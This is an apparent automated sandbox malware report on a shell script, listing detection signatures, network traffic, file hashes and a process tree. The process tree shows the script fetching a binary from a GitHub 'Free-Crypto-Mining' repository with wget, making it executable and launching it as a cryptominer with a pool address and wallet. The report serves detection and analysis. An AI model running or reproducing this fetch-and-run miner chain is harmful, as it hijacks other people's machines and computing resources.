Malware Analysis Report

2024-10-16 05:32

Sample ID 240713-wzef7asalr
Target triage.sh
SHA256 d02b94e23830079206ce75fd7232bf4f68f86703f08de981107a8f9ff49d9bac
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

d02b94e23830079206ce75fd7232bf4f68f86703f08de981107a8f9ff49d9bac

Threat Level: Shows suspicious behavior

The file triage.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks mountinfo of local process

Deletes log files

Legitimate hosting services abused for malware hosting/C2

Write file to user bin folder

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-13 18:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-13 18:21

Reported

2024-07-13 18:25

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

5s

Max time network

81s

Command Line

[/tmp/triage.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /var/lib/dpkg/tmp.ci/preinst /var/lib/dpkg/tmp.ci/preinst N/A
N/A /var/lib/dpkg/info/automake.postinst /var/lib/dpkg/info/automake.postinst N/A
N/A /tmp/cc /tmp/cc N/A

Checks mountinfo of local process

antivm
Description Indicator Process Target
File opened for reading /proc/1/mountinfo /usr/bin/ischroot N/A

Deletes log files

Description Indicator Process Target
File deleted /var/log/apt/eipp.log.xz /usr/bin/apt-get N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Write file to user bin folder

Description Indicator Process Target
File opened for modification /usr/bin/autom4te.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoreconf.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/c_rehash.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/openssl.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoscan.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/dh_autotools-dev_restoreconfig.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoconf.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoupdate.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/automake-1.16.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/curl-config.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/autoheader.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/ifnames.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/dh_autotools-dev_updateconfig.dpkg-new /usr/bin/dpkg N/A
File opened for modification /usr/bin/aclocal-1.16.dpkg-new /usr/bin/dpkg N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/setpriv N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/sudo N/A
File opened for reading /proc/self/loginuid /usr/bin/sudo N/A
File opened for reading /proc/self/mountinfo /usr/bin/ischroot N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/kernel/random/boot_id /usr/bin/setpriv N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/seccomp/actions_avail /usr/bin/sudo N/A
File opened for reading /proc/1/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/setpriv N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/sudo N/A
File opened for reading /proc/1/limits /usr/bin/sudo N/A
File opened for reading /proc/sys/kernel/ngroups_max /usr/bin/apt-get N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A
File opened for reading /proc/2596/status /usr/bin/setpriv N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/self/stat /usr/bin/sudo N/A
File opened for reading /proc/self/fd /usr/bin/apt-get N/A
File opened for reading /proc/2471/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/1/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/mkdir N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/wget N/A
File opened for reading /proc/2472/cgroup /usr/lib/apt/methods/http N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/dpkg N/A
File opened for reading /proc/filesystems /usr/bin/tar N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/cc /usr/bin/wget N/A

Processes

/tmp/triage.sh

[/tmp/triage.sh]

/usr/bin/sudo

[sudo apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y]

/usr/bin/apt-get

[apt-get install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential -y]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --configure libssl3t64:amd64]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure --recursive /tmp/apt-dpkg-install-EKjVwL]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/0-openssl_3.0.13-0ubuntu3.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/1-autoconf_2.71-3_all.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/2-autotools-dev_20220109.1_all.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f]

/usr/bin/tar

[tar -x -f]

/var/lib/dpkg/tmp.ci/preinst

[/var/lib/dpkg/tmp.ci/preinst install]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/3-automake_1%3a1.16.5-1.3ubuntu1_all.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/4-libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /tmp/apt-dpkg-install-EKjVwL/5-libjansson-dev_2.14-2build2_amd64.deb]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/openssl.postinst

[/var/lib/dpkg/info/openssl.postinst configure 3.0.13-0ubuntu3]

/var/lib/dpkg/info/automake.postinst

[/var/lib/dpkg/info/automake.postinst configure ]

/usr/bin/update-alternatives

[update-alternatives --install /usr/bin/automake automake /usr/bin/automake-1.16 34 --slave /usr/bin/aclocal aclocal /usr/bin/aclocal-1.16 --slave /usr/share/man/man1/automake.1.gz automake.1.gz /usr/share/man/man1/automake-1.16.1.gz --slave /usr/share/man/man1/aclocal.1.gz aclocal.1.gz /usr/share/man/man1/aclocal-1.16.1.gz]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/var/lib/dpkg/info/libc-bin.postinst

[/var/lib/dpkg/info/libc-bin.postinst triggered ldconfig]

/usr/sbin/ldconfig

[ldconfig -r /]

/sbin/ldconfig.real

[/sbin/ldconfig.real -r /]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/wget

[wget https://raw.githubusercontent.com/MomboteQ/Free-Crypto-Mining/main/verus/cc]

/usr/bin/chmod

[chmod +x cc]

/usr/bin/clear

[clear]

/usr/bin/nproc

[nproc]

/tmp/cc

[./cc -a verus -o stratum+tcp://de.vipor.net:5040 -u RHACKERwSVgjTvV4vNiTjmrkLTD7a92ALD.Triage -p x -t 1]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
GB 185.125.190.81:80 security.ubuntu.com tcp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp

Files

/var/cache/apt/archives/partial/libssl-dev_3.0.13-0ubuntu3.1_amd64.deb

MD5 4138878621ee8acdb626bb7a4027d5e5
SHA1 d9345d4abb6ee5fda1948631cad8f5412e786241
SHA256 198ff6fe2733b9b274974282fe8999d165e396a68dc904657ba06e13611a724b
SHA512 ce214815894ad395008df14705e2207b40efa71e8916d45d8ecae0950407710415441ba6ab749eee62d9600c4813ba5c20cdf7ac0448719b68af8f00db53f26f

/var/cache/apt/archives/partial/autoconf_2.71-3_all.deb

MD5 236e6a793a6ee85dae4507b067486a65
SHA1 d10a8d68662fb383109f6bc45df8673a763a36ca
SHA256 cc3f9f7a1e576173fb59c36652c0a67c6426feae752b352404ba92dfcb1b26c9
SHA512 646396c70a4546de5a331b247c74ba4dda573c419298127cf6b06bc349832aaea923a26159466c947a0b15125313284f3d4f9ba99ab83e7e352aacc64060aa2b

/var/cache/apt/archives/partial/libssl3t64_3.0.13-0ubuntu3.1_amd64.deb

MD5 c7adfa1dbef1936fdb5303511ed4572d
SHA1 27423f5990b3fb19e2186ed79ec84ab1e4b81fa8
SHA256 237c18b2ad458cbe0edd05eb431e801e2deb2ca4984890ab6f62c4af76a18b99
SHA512 1b08feb7a10e5b72cc7bcd3a744d8b98b70531de174eb06feec503d68fbca2b7fee69acf6d9defb426db70ee345ef0dd382e34e5c62ba94a9b0aab8b1fb0ad1e

/var/cache/apt/archives/partial/openssl_3.0.13-0ubuntu3.1_amd64.deb

MD5 ff159125fd42fe00126831160ba741cb
SHA1 8b45cbf8d60f5677157d997fb12638b3725f46cf
SHA256 2d2487723a3eef2c0b03664ded30791d395fc50934395e615eb6163951d6b2e0
SHA512 d5c24ce0572c122b0c8687eaabf90c98d132b0dcfc7e0e80420a963815929d12044d3fef712a885184f450cd12af7e552a426cac750cb90e9fdf78adaa6c582c

/var/cache/apt/archives/partial/autotools-dev_20220109.1_all.deb

MD5 554dc72dc46c7ebd3caf852031a94fe8
SHA1 2899e7c9989ee14a2be5a5a431a49498e1494084
SHA256 d909f0327b09d9a9136239caca975df89782fa28efd721c4eb4caea422d3fc5a
SHA512 b3add366e8549028f8de8c1c21796ff1ed8831e3432dedac73e795e021bcd23fb0c4e5fcbaf6f512b21b2f5d1c747bc7bccad1719a3255988ff2d7f5ce81f3d4

/var/cache/apt/archives/partial/automake_1%3a1.16.5-1.3ubuntu1_all.deb

MD5 0d3e4fe4ac2b80e59b7a6a867694f914
SHA1 98e88c17464981e574456000a04e2f36021d9066
SHA256 5ae9a98e73545002cd891f028859941af2a3c760cb6190e635c7ef36953912de
SHA512 dd62fa468463de8d184a507d9ae2e83c55df2f4737e0de199cb309b44228b8ffd7c27280570731cd947551209f0e87c8113e8b457571264a506bb9b26f32baf0

/var/cache/apt/archives/partial/libcurl4-openssl-dev_8.5.0-2ubuntu10.1_amd64.deb

MD5 87a77fd4e7a83a4ab299e1da7f78b4a8
SHA1 89262e11b4e30a9495644274ec7e4e6b99b3ea79
SHA256 cfb5bf90326d70901f6f01599c7500897df4b0ce1b51dfdb633ed6cb4b01057d
SHA512 c3efef7816a9b271b4f4afcd0b74737c56212529c07c54cb32ca8f44cbb51a0cdd7e1b01f43c3ec7be0d51c214df94ee212e2777f09d18aace8daeb80c156ad0

/var/cache/apt/archives/partial/libjansson-dev_2.14-2build2_amd64.deb

MD5 15a57c4aaa68c276c64e70246780cd60
SHA1 2ed0e9b3f935eb34e9641f7e83d0413eb907ea58
SHA256 0ac89018cbaeee7e9b40ed197dcf924970b6403184c3c087d9597f0c7e00397b
SHA512 5971da7c0e62e6f59fc76d9431f2f1283776cf76b30344774424fd4625ea65288a2ce2da41551f71149d2581c540713bd34f53369a6a0fa5909e6389a2263c64

/var/log/apt/eipp.log.xz

MD5 b9fb2f036fdc3169148404ff506d4572
SHA1 625037d69f2c1b4c6e24f50a3d91d19a61aad0c3
SHA256 f75720e4db724fe963661a13c16ae97fca85333e8b71b7845dd7bdd12f2ad6a4
SHA512 86a71e7455f01e3e8ba9cecc439151f301942f3018bdd6c62b36b9eb6d4a9214a3a78ceca8a7cc2ad1a74c5d81cb463c37784a8540a42279a5098b512a3dccbb

/var/lib/dpkg/updates/tmp.i

MD5 a0dd3757308fd7a6783d7963b9afb813
SHA1 4b862565a61fce2e8aaa8474ac29416dc9618678
SHA256 9c418fb2267a6d5470c140536b697e8a2238dc6c2abceb25529f0efe00ec8340
SHA512 19e2b284a659aeb67e0cd65a8f5c4feb62b8f4bf369c175cab0da45cc65242d5dec957fc0b4d47774664f9b32e246a764540b7f3086065d750d718bbd7ca658e

/var/lib/dpkg/tmp.ci/control

MD5 08b9c146773bab6ff6192a5887cff3e9
SHA1 1cc451a192e58cd1a30948f13706fb305965fcbf
SHA256 dbbedc6b874646ad9167492852ca96519a429563e778ada25fb2a0f13c11fe9c
SHA512 5047c305b43288f3acc9b4f75dc1c3be4afba7dabe4ddaf580a1e019b6ceee5604a053ebd1815a273b6d07abfb669a795598697cbecc48095c0dab04aca8898b

/var/lib/dpkg/tmp.ci/md5sums

MD5 d922d232746a792c9ad36a0f22e85572
SHA1 f1315c98940e04c2b126fd802d581d59cf5d9300
SHA256 ca6fc8f210caa7b6aa029b5ec8b2c8b4191015090866ac7cbaa3506ae36aba89
SHA512 a4ce537de0f6000786b6264cfff9d3ff209922bfd70c2b7502453fb94619b12f151be50063c4840404a8e565a542fd6bf96018110d77371a4a1b7e43dc24cf9a

/var/lib/dpkg/updates/tmp.i

MD5 f2ae8c1c925b0b49ae3e07a0a6912b42
SHA1 a9ab13080c13b90b4db9cc6aaa3ae7cfc00fe6ff
SHA256 80b54169b1c0d355518a6df988a8c020547eb25d524d9938d04d62462f0d1ec1
SHA512 2de559c3e63a1272acf8afbc8f6c44aa8356ea26965ae251da9cb71753a5d7a4f37bde6fa6b06668f8b17b47b92709ff013d2c0c3683c7221232125bacb05e29

/var/lib/dpkg/updates/tmp.i

MD5 1013746cf99e1ed2038d19eaeb9aabc7
SHA1 8e52e9bbdef9a7d3e2d11c72f35b6404b4a31ac0
SHA256 bd715b63990d7a217f11b7023babf309c0ec4ff4ab3990a94169fbe7aaf8eafc
SHA512 cb99ab288493dd619cced9f5224bed8668871b034800eb7c725b7913dd1af70b8d06506beab02fd8ece236e442066c99b745556049274c544261903e6654eee7

/var/lib/dpkg/updates/tmp.i

MD5 7e352cca1f1f07efb49a15c512782e90
SHA1 87e2a907a77dd25d6cb445eb1a24760906a60a22
SHA256 5bf87415592a58eb392466ea72248d0c8d9c00b0ffbb29c95713f3f9b0895bf3
SHA512 d9c6b351e56087bd9e47e13c62a800d76035bbca685b31d9d6e79ab82b942baf7acdb200eacc3293ba8c9207bae831e9db20db612f1c91d354e5fc450ea37ec4

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/tmp.ci/control

MD5 9b49fd2ef1c7555e79ef1616bd98a1c0
